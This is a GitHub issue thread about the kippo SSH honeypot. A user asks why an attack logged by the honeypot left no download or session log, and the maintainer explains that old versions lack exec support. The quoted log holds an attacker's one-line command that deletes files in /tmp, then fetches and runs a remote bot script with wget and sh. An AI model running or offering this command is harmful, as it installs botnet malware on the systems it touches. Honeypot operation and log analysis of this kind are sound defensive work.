### ISSUE TITLE
Unhandier Error, No Session Log,No File in DL

### ISSUE THREAD

**Issue by ghost** [desaster/kippo#203]
Hello today i got this error in my log, but there is no download in /dl and no session log in /log/tty

```
2016-04-12 11:34:52-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1561,X.Y.z.37] executing command "cd /tmp; rm -f *; wget http://X.Y.z.37/Bot/stun.sh ; chmod +x stun.sh ; sh stun.sh ; rm -f stun.sh"
2016-04-12 11:34:52-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1561,X.Y.z.37] Unhanded Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
        return context.call({ILogContext: newCtx}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
        return self.currentContext().callWithContext(ctx, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
        return func(*args,**kw)
      File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/channel.py", line 137, in requestReceived
        return f(data)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/session.py", line 68, in request_exec
        self.session.execCommand(pp, f)
      File "/home/rock/kippo-0.5/kippo/core/honeypot.py", line 328, in execCommand
        raise NotImplementedError
    exceptions.NotImplementedError: 

2016-04-12 11:35:02-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1561,X.Y.z.37] remote close
2016-04-12 11:35:02-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1561,X.Y.z.37] sending close 0
2016-04-12 11:35:02-0400 [HoneyPotTransport,1561,X.Y.z.37] connection lost
```

`
What does this mean? How was he/she able to delete log and downloaded file? Thanks!

**Comment by desaster** [comment]
old version with no exec support - working as intended
